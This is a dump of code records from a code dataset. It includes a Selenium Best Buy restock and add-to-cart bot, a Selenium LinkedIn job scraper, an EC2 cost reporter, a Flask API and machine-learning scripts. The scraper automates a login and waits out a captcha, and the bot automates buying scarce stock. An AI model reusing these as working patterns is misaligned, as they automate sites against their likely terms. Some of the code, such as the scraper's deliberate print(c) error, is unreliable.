re-create users.\")\n def reset_app():\n\n if click.confirm(\"WARNING! 
Perform full reset?\", abort=True):\n\n run_drop_db()\n run_init_db()\n run_create_app_user()\n","sub_path":"app/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":9976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"119478652","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.firefox.options import Options\nimport datetime\nimport time\nimport winsound\n\nALARM_BEEP_DURATION = 1000 # milliseconds\nALARM_FREQ = 440 # Hz\nALARM_DURATION = 5 # 2n sec\nfirefox_profile_path = r'C:\\Users\\Justin\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\j4e948dv.default-release'\n# url = 'https://www.bestbuy.com/site/amd-ryzen-5-5600x-4th-gen-6-core-12-threads-unlocked-desktop-processor-with-wraith-stealth-cooler/6438943.p?skuId=6438943'\n# url = 'https://www.bestbuy.com/site/nvidia-geforce-rtx-3060-ti-8gb-gddr6-pci-express-4-0-graphics-card-steel-and-black/6439402.p?skuId=6439402'\n# url = 'https://www.bestbuy.com/site/nvidia-geforce-rtx-3070-8gb-gddr6-pci-express-4-0-graphics-card-dark-platinum-and-black/6429442.p?skuId=6429442'\n# url = 'https://www.bestbuy.com/site/nvidia-geforce-rtx-3070-ti-8gb-gddr6x-pci-express-4-0-graphics-card-dark-platinum-and-black/6465789.p?skuId=6465789'\n# url = 'https://www.bestbuy.com/site/nvidia-geforce-rtx-3080-10gb-gddr6x-pci-express-4-0-graphics-card-titanium-and-black/6429440.p?skuId=6429440'\nurl = 'https://www.bestbuy.com/site/nvidia-geforce-rtx-3090-24gb-gddr6x-pci-express-4-0-graphics-card-titanium-and-black/6429434.p?skuId=6429434'\n\n# options = Options()\n# options.headless = True\n# driver = webdriver.Firefox(options=options)\nprofile = webdriver.FirefoxProfile(firefox_profile_path)\ndriver = webdriver.Firefox(firefox_profile=profile)\n\ndriver.get(url)\ntry:\n while True:\n add_to_cart_but = WebDriverWait(driver, 3600).until(\n EC.presence_of_element_located((By.CSS_SELECTOR, '.add-to-cart-button')))\n \n if 'btn-disabled' in add_to_cart_but.get_attribute(\"class\"):\n time.sleep(2)\n driver.refresh()\n else:\n break\n\n # add_on_checkbox = WebDriverWait(driver, 10).until(\n # EC.presence_of_element_located((By.ID, 'add-on-selector-add-on-item-checkbox')))\n # add_on_checkbox.click()\n\n add_to_cart_but = WebDriverWait(driver, 3600).until(\n EC.element_to_be_clickable((By.CSS_SELECTOR, '.add-to-cart-button')))\n print(add_to_cart_but.value_of_css_property('background-color'))\n add_to_cart_but.click()\n\n print('1st Add to Cart button clicked. In Queue.', datetime.datetime.now())\n for _ in range(3):\n winsound.Beep(ALARM_FREQ, ALARM_BEEP_DURATION)\n time.sleep(1)\n print(add_to_cart_but.value_of_css_property('background-color'))\n\n while True:\n # add_to_cart_but = WebDriverWait(driver, 10).until(\n # EC.presence_of_element_located((By.CSS_SELECTOR, '.add-to-cart-button')))\n please_wait_enabled = add_to_cart_but.value_of_css_property('background-color')\n\n if please_wait_enabled == 'rgb(197, 203, 213)':\n time.sleep(0.05)\n else:\n break\n\n add_to_cart_but = WebDriverWait(driver, 3600).until(\n EC.presence_of_element_located((By.CSS_SELECTOR, '.add-to-cart-button')))\n add_to_cart_but.click()\n\n print('2nd Add to Cart button clicked. 
Item added to Cart', datetime.datetime.now())\n print(add_to_cart_but.value_of_css_property('background-color'))\n\n for _ in range(ALARM_DURATION):\n winsound.Beep(ALARM_FREQ, ALARM_BEEP_DURATION)\n time.sleep(1)\n\nexcept KeyboardInterrupt:\n print('stopping')\n\nexcept Exception as e:\n print(e)\n for _ in range(10):\n winsound.Beep(ALARM_FREQ, 500)\n time.sleep(0.5)","sub_path":"bb90.py","file_name":"bb90.py","file_ext":"py","file_size_in_byte":3631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"148084713","text":"from selenium import webdriver\nimport pandas as pd\nimport re\nfrom bs4 import BeautifulSoup\nimport os\nimport time\npd.set_option('max_colwidth', 200)\n\ncount = 0\n\n\n# Function to extract the job id from the url\ndef extract_job_id(jobs_id):\n urls = []\n\n for jobs_id in jobs_id:\n urls.append(re.findall(r'([0-9]{10})', jobs_id)[0])\n\n urls = list(map(int, urls))\n return urls\n\n\n# Function to check if the jobs to be scraped are already on the list\ndef check_repeated_jobs(new_urls, already_on_list):\n clean_url = []\n\n for i in range(len(new_urls)):\n # print(i)\n if new_urls[i] in already_on_list:\n print(new_urls[i] in already_on_list, new_urls[i])\n\n else:\n clean_url.append(new_urls[i])\n\n # print('New Links', clean_url)\n return clean_url\n\n\n# Function to scrape the job data from the web. liked_jobs is defined as '1' or '0' depending on if the job to be\n# scraped is one that the user wants to apply or not\ndef retrieve_job_data(urls, liked_job, count):\n\n browser = webdriver.Chrome(executable_path='/Users/petanth/Downloads/chromedriver')\n browser.implicitly_wait(2)\n\n # Variables to save the jobs data\n job_like = []\n post_title = []\n company_name = []\n post_date = []\n job_location_city = []\n job_location_region = []\n job_location_country = []\n job_desc = []\n level = []\n emp_type = []\n functions = []\n industries = []\n job_id = []\n link = []\n\n for urls in urls:\n print('Job_ID to be scraped: ', urls)\n\n if count == 0:\n\n browser.get(url='https://www.linkedin.com/login/es?fromSignIn=true&trk=guest_homepage-basic_nav-header-signin')\n\n browser.find_element_by_xpath(\"//*[@id='username']\").send_keys('user')\n browser.find_element_by_xpath(\"//*[@id='password']\").send_keys('password')\n browser.find_element_by_xpath(\"//*[@id='organic-div']/form/div[3]/button\").click()\n #browser.find_element_by_xpath('//*[@id=\"artdeco-global-alert-container\"]/div[1]/section/div/div[2]/button[2]').click()\n\n time.sleep(14) # sleep for 14 sec in order to pass captcha\n\n job_url = 'https://www.linkedin.com/jobs/view/' + str(urls)\n browser.get(url=job_url)\n count = count + 1\n\n else:\n job_url = 'https://www.linkedin.com/jobs/view/' + str(urls)\n browser.get(url=job_url)\n\n # Parse the html content\n soup = BeautifulSoup(browser.page_source, \"lxml\")\n\n print(\"This is the job url: \", job_url)\n\n # print(soup.prettify()) # Line used to look on HTML for the data to be scraped\n\n # job title\n try:\n job_titles = soup.find(\"h1\", class_=\"t-24 t-bold\").text.strip()\n job_titles = re.sub(\"[^a-zA-Z0-9äöüÄÖÜß\\s]+\", \" \", str(job_titles))\n job_titles = re.sub(\"\\s{2,}\", \" \", str(job_titles))\n post_title.append(job_titles)\n except:\n print('job_titles')\n post_title.append('0')\n\n # company name\n try:\n company_names = soup.find(\"span\", class_=\"jobs-unified-top-card__subtitle-primary-grouping mr2 t-black\").text.strip()\n company_names = re.split(\"\\n+\", company_names)\n 
company_name.append(company_names[0])\n except:\n print('company_names')\n company_name.append('0')\n\n # job location\n try:\n job_locations = soup.find(\"span\", class_=\"jobs-unified-top-card__bullet\").text.strip().split(\", \")\n\n # in case the location specified includes the city, region and country\n if len(job_locations) == 3:\n job_location_city.append(job_locations[len(job_locations)-3])\n job_location_region.append(job_locations[len(job_locations)-2])\n job_location_country.append(job_locations[len(job_locations)-1])\n\n # in case the location specified includes the region and country\n else:\n job_location_city.append('0')\n job_location_region.append(job_locations[len(job_locations)-2])\n job_location_country.append(job_locations[len(job_locations)-1])\n\n except:\n print('job location')\n job_location_city.append('0')\n job_location_region.append('0')\n job_location_country.append('0')\n\n # posting date\n try:\n post_dates = soup.find('span', class_=\"jobs-unified-top-card__posted-date\").text.strip()\n post_date.append(post_dates)\n except:\n print('posting date')\n post_date.append('0')\n\n # job description\n try:\n job_descs = soup.find(\"div\",\n class_=\"jobs-box__html-content jobs-description-content__text t-14 t-normal\").text.strip()\n # Regex to match and delete 1.two or more spaces and 2. newlines\n job_descs = re.sub(\"[^a-zA-Z0-9äöüÄÖÜß\\s]+\", \" \", str(job_descs))\n job_descs = re.sub(\"(\\s{2,})|(\\n+)|(;)\", \"\", str(job_descs))\n job_desc.append(job_descs)\n except:\n print('job description')\n job_desc.append('0')\n\n # job additional data\n try:\n print(c)\n # additional_data_container = []\n # for span in soup.find_all('div', class_='jobs-description-details'):\n # additional_data_container.append(span.text)\n #\n # # print(additional_data_container[0])\n #\n # # job level\n # level.append(additional_data_container[0])\n #\n # # job type\n # emp_type.append(additional_data_container[1])\n #\n # # job function\n # functions.append(additional_data_container[2])\n #\n # # job industry\n # industries.append(additional_data_container[3])\n #\n # # liked job (VARIABLE TO MARK IF A JOB IS ONE THAT YOU LIKE)\n # job_like.append(liked_job)\n #\n # # linkedin job id\n # job_id.append(urls)\n #\n # # job url\n # link.append(job_url)\n except:\n print('job additional data')\n level.append('0')\n emp_type.append('0')\n functions.append('0')\n industries.append('0')\n job_like.append(liked_job)\n job_id.append(urls)\n link.append(job_url)\n\n print('The number of scraped jobs is: ', len(post_title))\n print(len(job_like))\n print(len(post_date))\n print(len(company_name))\n print(len(post_title))\n print(len(job_location_city))\n print(len(job_location_region))\n print(len(job_location_country))\n print(len(job_desc))\n print(len(level))\n print(len(emp_type))\n print(len(functions))\n print(len(industries))\n print(len(job_id))\n print(len(link))\n\n # Create a DataFrame with the scraped data\n job_data = pd.DataFrame({'Liked job?': job_like,\n 'Date': post_date,\n 'Company Name': company_name,\n 'Job Title': post_title,\n 'City': job_location_city,\n 'Region': job_location_region,\n 'Country': job_location_country,\n 'Description': job_desc,\n 'Level': level,\n 'Type': emp_type,\n 'Function': functions,\n 'Industry': industries,\n 'ID': job_id,\n 'Link': link\n })\n\n # clean description column\n job_data['Description'] = job_data['Description'].str.replace('\\n', ' ')\n browser.close()\n\n return job_data\n\n\n# Function to update dataframe on an existing csv 
file\ndef write_in_existing_file(dataframe_jobs):\n dataframe_jobs.to_csv('ScrapeOfLikedJobs.csv', mode='a', sep='|', header=False, index=False)\n\n\n# Function to write dataframe on a new csv file\ndef write_in_new_file(dataframe_jobs):\n dataframe_jobs.to_csv('ScrapeOfLikedJobs.csv', mode='a', sep='|', index=False)\n\n\n# *******************************************\n# List of variables to be defined by the user\n# *******************************************\n\n\n# List of URLs where the text will be scraped from\nlinks = [\"https://www.linkedin.com/jobs/view/2368902042\",\n \"https://www.linkedin.com/jobs/view/2369634018\",\n \"https://www.linkedin.com/jobs/view/2379187906\",\n \"https://www.linkedin.com/jobs/view/2359622787\",\n \"https://www.linkedin.com/jobs/view/2379084299\",\n \"https://www.linkedin.com/jobs/view/2369914822\"]\n\n# Define if the jobs specified on the \"links\" variable is liked (1) or not (0)\nis_liked = '1'\n\n\n# ********************\n# Start of the program\n# ********************\nnew_job_ID_list = extract_job_id(links)\n\nif os.path.isfile('ScrapeOfLikedJobs.csv'):\n print(\"A file already exists. Reading the data...\")\n SoLJ = pd.read_csv('ScrapeOfLikedJobs.csv', sep='|')\n index = pd.Index(SoLJ['ID'])\n print(\"Checking for jobs already on the file...\")\n url = check_repeated_jobs(new_job_ID_list, index)\n\n # In case there is new jobs that are not on the list, then the new data is retrieved\n if len(url) != 0:\n print(\"List of new jobs not found on the existing file: \", url)\n print(\"Retrieving the job data from the website...\")\n job_data = retrieve_job_data(url, is_liked, count)\n print(\"Writing the new data on the file...\")\n write_in_existing_file(job_data)\n # with pd.option_context('display.max_rows', None, 'display.max_columns', None):\n # print(job_data.head(2))\n\n else:\n print(\"All links provided contain jobs already on the destination file\")\n print(\"No new data will be writen on the file\")\n\nelse:\n job_data = retrieve_job_data(new_job_ID_list, is_liked, count)\n write_in_new_file(job_data)\n with pd.option_context('display.max_rows', None, 'display.max_columns', None):\n print(job_data.head(2))\n\n\n# TODO\n# 1.Write README\n# 2.Clean code and improve comments\n# 3.Improve additional data part deleting the print(c)","sub_path":"ScrapeOfLikedJobs_Selenium.py","file_name":"ScrapeOfLikedJobs_Selenium.py","file_ext":"py","file_size_in_byte":10355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"426083043","text":"import logging\nlogger = logging.getLogger('isitfit')\n\nimport pandas as pd\nfrom tabulate import tabulate\n\n# https://pypi.org/project/termcolor/\nfrom termcolor import colored\n\nfrom isitfit.cost.redshift.reporter import ReporterBase\n\nclass ReporterAnalyzeEc2(ReporterBase):\n\n def postprocess(self, context_all):\n # unpack\n self.analyzer = context_all['analyzer']\n n_ec2_total, self.mm, n_ec2_analysed, region_include = context_all['n_ec2_total'], context_all['mainManager'], context_all['n_ec2_analysed'], context_all['region_include']\n\n # proceed\n cwau_val = 0\n if self.analyzer.sum_capacity!=0:\n cwau_val = self.analyzer.sum_used/self.analyzer.sum_capacity*100\n\n cwau_color = 'yellow'\n if cwau_val >= 70:\n cwau_color = 'green'\n elif cwau_val <= 30:\n cwau_color = 'red'\n\n dt_start = self.mm.StartTime.strftime(\"%Y-%m-%d\")\n dt_end = self.mm.EndTime.strftime(\"%Y-%m-%d\")\n\n ri_max = 3\n ri_ell = \"\" if len(region_include)<=ri_max else \"...\"\n ri_str = 
\", \".join(region_include[:ri_max])+ri_ell\n \n self.table = [\n {'color': '',\n 'label': \"Start date\",\n 'value': \"%s\"%dt_start\n },\n {'color': '',\n 'label': \"End date\",\n 'value': \"%s\"%dt_end\n },\n {'color': '',\n 'label': \"Regions\",\n 'value': \"%i (%s)\"%(len(region_include), ri_str)\n },\n {'color': '',\n 'label': \"EC2 machines (total)\",\n 'value': \"%i\"%n_ec2_total\n },\n {'color': '',\n 'label': \"EC2 machines (analysed)\",\n 'value': \"%i\"%n_ec2_analysed\n },\n {'color': 'cyan',\n 'label': \"Billed cost\",\n 'value': \"%0.0f $\"%self.analyzer.sum_capacity\n },\n {'color': 'cyan',\n 'label': \"Used cost\",\n 'value': \"%0.0f $\"%self.analyzer.sum_used\n },\n {'color': cwau_color,\n 'label': \"CWAU (Used/Billed)\",\n 'value': \"%0.0f %%\"%cwau_val\n },\n ]\n\n # done\n return context_all\n\n\n def display(self, context_all):\n def get_row(row):\n def get_cell(i):\n retc = row[i] if not row['color'] else colored(row[i], row['color'])\n return retc\n \n retr = [get_cell('label'), get_cell('value')]\n return retr\n\n dis_tab = [get_row(row) for row in self.table]\n\n # logger.info(\"Summary:\")\n logger.info(\"Cost-Weighted Average Utilization (CWAU) of the AWS EC2 account:\")\n logger.info(\"\")\n logger.info(tabulate(dis_tab, headers=['Field', 'Value']))\n logger.info(\"\")\n logger.info(\"For reference:\")\n logger.info(colored(\"* CWAU >= 70% is well optimized\", 'green'))\n logger.info(colored(\"* CWAU <= 30% is underused\", 'red'))\n\n return context_all\n\n\n def email(self, context_all):\n \"\"\"\n ctx - click context\n \"\"\"\n context_2 = {}\n context_2['emailTo'] = context_all['emailTo']\n context_2['click_ctx'] = context_all['click_ctx']\n context_2['dataType'] = 'cost analyze' # ec2, not redshift\n context_2['dataVal'] = {'table': self.table}\n super().email(context_2)\n\n return context_all\n\n\n\n\nclass ReporterOptimizeEc2(ReporterBase):\n\n def __init__(self):\n # for final csv file\n self.csv_fn_final = None\n\n # members that will contain the results of the optimization\n self.df_sort = None\n self.sum_val = None\n\n\n def postprocess(self, context_all):\n # unpack\n self.analyzer = context_all['analyzer']\n self.df_cat = context_all['df_cat']\n\n # process\n self._after_all()\n self._storecsv_all()\n return context_all\n\n def _after_all(self):\n df_all = pd.DataFrame(self.analyzer.ec2_classes)\n\n # if no data\n if df_all.shape[0]==0:\n self.df_sort = None\n self.sum_val = None\n return\n\n # merge current type hourly cost\n map_cost = self.df_cat[['API Name', 'cost_hourly']]\n df_all = df_all.merge(map_cost, left_on='instance_type', right_on='API Name', how='left').drop(['API Name'], axis=1)\n\n # merge the next-smaller instance type from the catalog for instances classified as Underused\n map_smaller = self.df_cat[['API Name', 'type_smaller', 'Linux On Demand cost_smaller']].rename(columns={'Linux On Demand cost_smaller': 'cost_hourly_smaller'})\n df_all = df_all.merge(map_smaller, left_on='instance_type', right_on='API Name', how='left').drop(['API Name'], axis=1)\n\n # merge next-larger instance type\n map_larger = self.df_cat[['API Name', 'type_smaller', 'cost_hourly']].rename(columns={'type_smaller': 'API Name', 'API Name': 'type_larger', 'cost_hourly': 'cost_hourly_larger'})\n df_all = df_all.merge(map_larger, left_on='instance_type', right_on='API Name', how='left').drop(['API Name'], axis=1)\n\n # convert from hourly to 3-months\n for fx1, fx2 in [('cost_3m', 'cost_hourly'), ('cost_3m_smaller', 'cost_hourly_smaller'), ('cost_3m_larger', 
'cost_hourly_larger')]:\n df_all[fx1] = df_all[fx2] * 24 * 30 * 3\n df_all[fx1] = df_all[fx1].fillna(value=0).astype(int)\n\n # imply a recommended type\n from isitfit.cost.ec2.calculator_optimize import class2recommendedType, class2recommendedCost\n df_all['recommended_type'] = df_all.apply(class2recommendedType, axis=1)\n df_all['savings'] = df_all.apply(class2recommendedCost, axis=1)\n df_all['savings'] = df_all.savings.fillna(value=0).astype(int)\n\n # keep a subset of columns\n df_all = df_all[['region', 'instance_id', 'instance_type', 'classification_1', 'classification_2', 'cost_3m', 'recommended_type', 'savings', 'tags']]\n\n # display\n #df_all = df_all.set_index('classification_1')\n #for v in ['Idle', 'Underused', 'Overused', 'Normal']:\n # logger.info(\"\\nInstance classification_1: %s\"%v)\n # if v not in df_all.index:\n # logger.info(\"None\")\n # else:\n # logger.info(df_all.loc[[v]]) # use double brackets to maintain single-row dataframes https://stackoverflow.com/a/45990057/4126114\n #\n # logger.info(\"\\n\")\n\n # main results\n self.df_sort = df_all.sort_values(['savings'], ascending=True)\n self.sum_val = df_all.savings.sum()\n\n\n def _storecsv_all(self, *args, **kwargs):\n if self.df_sort is None:\n return\n\n import tempfile\n with tempfile.NamedTemporaryFile(prefix='isitfit-full-ec2-', suffix='.csv', delete=False) as csv_fh_final:\n self.csv_fn_final = csv_fh_final.name\n logger.debug(colored(\"Saving final results to %s\"%csv_fh_final.name, \"cyan\"))\n self.df_sort.to_csv(csv_fh_final.name, index=False)\n logger.debug(colored(\"Save complete\", \"cyan\"))\n\n\n def display(self, context_all):\n if self.df_sort is None:\n logger.info(colored(\"No EC2 instances found\", \"red\"))\n return context_all\n\n # display\n # Edit 2019-09-25 just show the full list. Will add filtering later. 
This way it's less ambiguous when all instances are \"Normal\"\n # self.df_sort.dropna(subset=['recommended_type'], inplace=True)\n \n # if no recommendations\n if self.df_sort.shape[0]==0:\n logger.info(colored(\"No optimizations from isitfit for this AWS EC2 account\", \"red\"))\n return context_all\n \n # if there are recommendations, show them\n sum_comment = \"extra cost\" if self.sum_val>0 else \"savings\"\n sum_color = \"red\" if self.sum_val>0 else \"green\"\n\n #logger.info(\"Optimization based on the following CPU thresholds:\")\n #logger.info(self.thresholds)\n #logger.info(\"\")\n logger.info(colored(\"Recommended %s: %0.0f $ (over the next 3 months)\"%(sum_comment, self.sum_val), sum_color))\n logger.info(\"\")\n\n # display dataframe\n from isitfit.utils import display_df\n display_df(\n \"Recommended EC2 size changes\",\n self.df_sort,\n self.csv_fn_final,\n self.df_sort.shape,\n logger\n )\n\n# with pd.option_context(\"display.max_columns\", 10):\n# logger.info(\"Details\")\n# if self.df_sort.shape[0]<=10:\n# logger.info(df2tabulate(self.df_sort))\n# else:\n# logger.info(df2tabulate(self.df_sort.head(n=5)))\n# logger.info(\"...\")\n# logger.info(df2tabulate(self.df_sort.tail(n=5)))\n# logger.info(\"\")\n# logger.info(colored(\"Table originally with %i rows is truncated for top and bottom 5 only.\"%self.df_sort.shape[0], \"cyan\"))\n# logger.info(colored(\"Consider filtering it with --n=x for the 1st x results or --filter-tags=foo using a value from your own EC2 tags.\", \"cyan\"))\n\n if self.analyzer.n!=-1:\n logger.info(colored(\"This table has been filtered for only the 1st %i underused results\"%self.analyzer.n, \"cyan\"))\n\n return context_all\n","sub_path":"isitfit/cost/ec2/reporter.py","file_name":"reporter.py","file_ext":"py","file_size_in_byte":8686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"428188145","text":"from flask import Blueprint\nfrom flask_restful import fields, marshal, Resource\n\nfrom .resource import *\n\nprov_fields = {\n 'id': fields.Integer,\n 'nama': fields.String\n}\n\nkab_fields = {\n 'id': fields.Integer,\n 'nama': fields.String,\n 'provinsi_id': fields.String\n}\n\n\ndef get_or_abort(id, lvl: int):\n if lvl == 1:\n try:\n query = models.GeoProvinsi.get_by_id(id)\n except models.GeoProvinsi.DoesNotExist:\n abort(404)\n else:\n return query\n elif lvl == 2:\n try:\n query = models.GeoKabupaten.select().where(models.GeoKabupaten.provinsi_id == id).get()\n except models.GeoKabupaten.DoesNotExist:\n abort(404)\n else:\n return query\n else:\n return abort(404)\n\n\nclass GetProv(Resource):\n # @login_required\n def get(self):\n prov = [marshal(prov, prov_fields)\n for prov in models.GeoProvinsi.select()]\n return {'success': True,\n 'data': prov}\n\n\nclass GetKab(Resource):\n # @login_required\n def get(self, id):\n get_or_abort(id, 2)\n\n kab = [marshal(kab, kab_fields)\n for kab in models.GeoKabupaten.select().where(models.GeoKabupaten.provinsi_id == id)]\n return {'success': True,\n 'data': kab}\n\n\ngeo_api = Blueprint('resources.geo', __name__)\napi = Api(geo_api)\napi.add_resource(GetProv, '/geo/provinsi', endpoint='geo/provinsi')\napi.add_resource(GetKab, '/geo/kabupaten/', endpoint='geo/kabupaten')\n","sub_path":"resources/geo.py","file_name":"geo.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"571608764","text":"import sys, os\nimport numpy as np\nsys.path.append(os.getcwd() + 
r'\\Modules')\nfrom sklearn.datasets import make_blobs\nfrom sklearn.model_selection import train_test_split\nimport SVM_SMO as SVM\nimport matplotlib.pyplot as plt\nimport Classification_Metrics as cm\n\ndef plot_line(model):\n z = np.linspace(-2, 3, 10)\n w = model.w\n b = model.b\n L = (-w[0] / w[1])* z - b / w[1] # 二维绘图\n plt.plot(z, L) # 绘制分离直线\n# end\n\ndef one_versus_all(X, y, k):\n \"\"\" one_versus_all & SMO 实现 \"\"\"\n m, n = X.shape\n testnum = np.int64(0.2* m)\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=testnum, random_state=0, stratify=y)\n H = np.empty(shape=(testnum, k)) # 置信度矩阵\n for i in range(k): # k元分类任务\n y_train_i = 2* (y_train == i).astype(np.int64).reshape(-1, 1) - 1 # 针对第 k类分类时的标签\n model = SVM.SVM_SMO() # 产生专门预测该类型的模型\n model.fit(X_train, y_train_i, N=10)\n y_pred_i = model.predict_confidence(X_test).reshape(-1, 1) # 列向量\n H[:, i] = y_pred_i.reshape(testnum,)\n plot_line(model)\n y_pred = np.argmax(H, axis=1) # 选取置信度最大的\n return y_pred, y_test\n\n\nk = 3\nX, y = make_blobs(n_samples=100, centers=k, n_features=2, cluster_std=0.2, random_state=0) # 保证数据是线性可分的\ny_pred, y_test = one_versus_all(X, y, k)\n\nplt.scatter(X[:, 0][y==0], X[:, 1][y==0], c='r', s=5)\nplt.scatter(X[:, 0][y==1], X[:, 1][y==1], c='b', s=5)\nplt.scatter(X[:, 0][y==2], X[:, 1][y==2], c='y', s=5)\nplt.scatter(X[:, 0][y==3], X[:, 1][y==3], c='purple', s=5)\n\nplt.show()\n","sub_path":"Project/Ink_Blot_Classification_Problem/Solution1.py","file_name":"Solution1.py","file_ext":"py","file_size_in_byte":1963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"609368955","text":"#%%\r\n\r\nimport time\r\nstart_time = time.time()\r\n\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport os\r\nimport PIL\r\nimport tensorflow as tf\r\nimport pandas as pd\r\n\r\nfrom tensorflow import keras\r\nfrom tensorflow.keras import layers\r\nfrom tensorflow.keras.models import Sequential\r\n\r\nprint(\"TensorFlow version:\", tf.__version__)\r\nprint(\"Keras version:\", keras.__version__)\r\nprint(\"GPU is\", \"available\" if tf.config.list_physical_devices('GPU') else \"NOT AVAILABLE\")\r\n\r\nmodel_name = \"projekt_2_cnn\"\r\nmodel_path = 'G:/Projects/Datasets/models/Intel-Image-Classification/' + model_name +'.h5'\r\nfolder = 'G:/Projects/Datasets/Intel-Image-Classification/'\r\nprint(\"Data path: \", folder)\r\nprint(\"Model save path: \", model_path)\r\n\r\nbatch_size = 128\r\nimg_height = 150\r\nimg_width = 150\r\nvalidation_split = 0.3\r\nepochs=30\r\nwith_cache = False\r\n\r\nimport pathlib\r\ndata_dir = pathlib.Path(folder)\r\n\r\nprint(\"___Training dataset___\")\r\ntrain_ds = tf.keras.preprocessing.image_dataset_from_directory(\r\n pathlib.Path.joinpath(data_dir, \"train/\"),\r\n image_size=(img_height, img_width),\r\n batch_size=batch_size\r\n)\r\nprint(\"▔▔▔▔▔▔▔▔▔▔▔▔▔\")\r\n\r\nprint(\"___Validation dataset___\")\r\nval_ds = tf.keras.preprocessing.image_dataset_from_directory(\r\n pathlib.Path.joinpath(data_dir, \"test/\"),\r\n validation_split=validation_split,\r\n subset=\"validation\",\r\n seed=123,\r\n image_size=(img_height, img_width),\r\n batch_size=batch_size\r\n)\r\nprint(\"▔▔▔▔▔▔▔▔▔▔▔▔▔\")\r\n\r\nprint(\"___Test dataset___\")\r\ntest_ds = tf.keras.preprocessing.image_dataset_from_directory(\r\n pathlib.Path.joinpath(data_dir, \"test/\"),\r\n validation_split=validation_split,\r\n subset=\"training\",\r\n seed=123,\r\n image_size=(img_height, img_width),\r\n 
batch_size=batch_size\r\n)\r\nprint(\"▔▔▔▔▔▔▔▔▔▔▔▔▔\")\r\n\r\nclass_names = train_ds.class_names\r\nprint(\"Class names: \")\r\nprint(class_names)\r\n\r\nfor image_batch, labels_batch in train_ds:\r\n print(\"Shape:\")\r\n print(image_batch.shape)\r\n print(labels_batch.shape)\r\n break\r\n\r\nif(with_cache):\r\n AUTOTUNE = tf.data.experimental.AUTOTUNE\r\n print(AUTOTUNE)\r\n train_ds = train_ds.cache().shuffle(1000).prefetch(buffer_size=AUTOTUNE)\r\n val_ds = val_ds.cache().prefetch(buffer_size=AUTOTUNE)\r\ntrain_ds = train_ds.prefetch(buffer_size=32)\r\nval_ds = val_ds.prefetch(buffer_size=32)\r\n\r\ndata_augmentation = keras.Sequential([\r\n layers.experimental.preprocessing.RandomFlip(\"horizontal\", input_shape=(img_height, img_width,3)),\r\n layers.experimental.preprocessing.RandomRotation(0.1),\r\n layers.experimental.preprocessing.RandomZoom(0.1),\r\n])\r\n\r\ntime_start = time.time()\r\n\r\n\r\nmodel = Sequential([\r\n layers.experimental.preprocessing.Rescaling(\r\n 1./255, \r\n input_shape=(img_height, img_width,3)\r\n ),\r\n keras.layers.Conv2D(32, 3, activation='relu'),\r\n keras.layers.MaxPool2D(),\r\n layers.Dropout(0.1),\r\n\r\n keras.layers.Conv2D(16, 6, activation='relu'), \r\n keras.layers.MaxPool2D(),\r\n layers.Dropout(0.3),\r\n\r\n keras.layers.Conv2D(16, 10, activation='relu'), \r\n keras.layers.MaxPool2D(),\r\n layers.Dropout(0.3),\r\n\r\n keras.layers.Flatten(), \r\n\r\n keras.layers.Dense(128, activation='relu'), \r\n layers.Dropout(0.5),\r\n\r\n keras.layers.Dense(64, activation='relu'), \r\n layers.Dense(len(class_names))\r\n])\r\n\r\n\r\nmodel.compile(\r\n optimizer='adam',\r\n loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),\r\n metrics=['accuracy'])\r\n\r\nmodel.summary()\r\n\r\nprint(\"----------------------------- Train -----------------------------\")\r\nhistory = model.fit(\r\n train_ds,\r\n validation_data=val_ds,\r\n epochs=epochs\r\n)\r\nprint(\"----------------------------------------------------------\")\r\n\r\nmodel.save(model_path)\r\n\r\nprint(\"----------------------------- Evaluate -----------------------------\")\r\ntest_scores = model.evaluate(test_ds)\r\nprint(test_scores)\r\n\r\nlabels = []\r\npredicions = []\r\ntest_accuracy = tf.keras.metrics.Accuracy()\r\nlabelsF = []\r\npredicionsF = []\r\nfor (x, y) in test_ds:\r\n logits = model(x, training=False)\r\n prediction = tf.argmax(logits, axis=1, output_type=tf.int32)\r\n predicions.append(prediction)\r\n labels.append(y)\r\n test_accuracy(prediction, y)\r\nprint(\" || Test set accuracy: {:.3%} \".format(test_accuracy.result()))\r\n\r\nfor y in labels:\r\n for y2 in y:\r\n labelsF.append(y2)\r\n \r\nfor y in predicions:\r\n for y2 in y:\r\n predicionsF.append(y2)\r\n\r\npredictions = model.predict(test_ds)\r\npredicted_class = np.argmax(predictions, axis=-1)\r\nfrom sklearn.metrics import confusion_matrix\r\ncm = confusion_matrix(labelsF, predicionsF)\r\n\r\ntime_end = time.time() - time_start\r\nprint(\"Czas Score: %.2f sec\" % (time_end))\r\nprint(\"Confusion matrix: \")\r\nprint(cm)\r\n\r\nprint(\"----------------------------------------------------------\")\r\n\r\nprint(\"----------------------------- Visualize results -----------------------------\")\r\ndef print_plot():\r\n acc = history.history['accuracy']\r\n val_acc = history.history['val_accuracy']\r\n loss = history.history['loss']\r\n val_loss = history.history['val_loss']\r\n\r\n plt.figure(figsize=(7,7))\r\n epochs_range = range(epochs)\r\n plt.plot(epochs_range, acc, '.-r', label='Training Accuracy')\r\n 
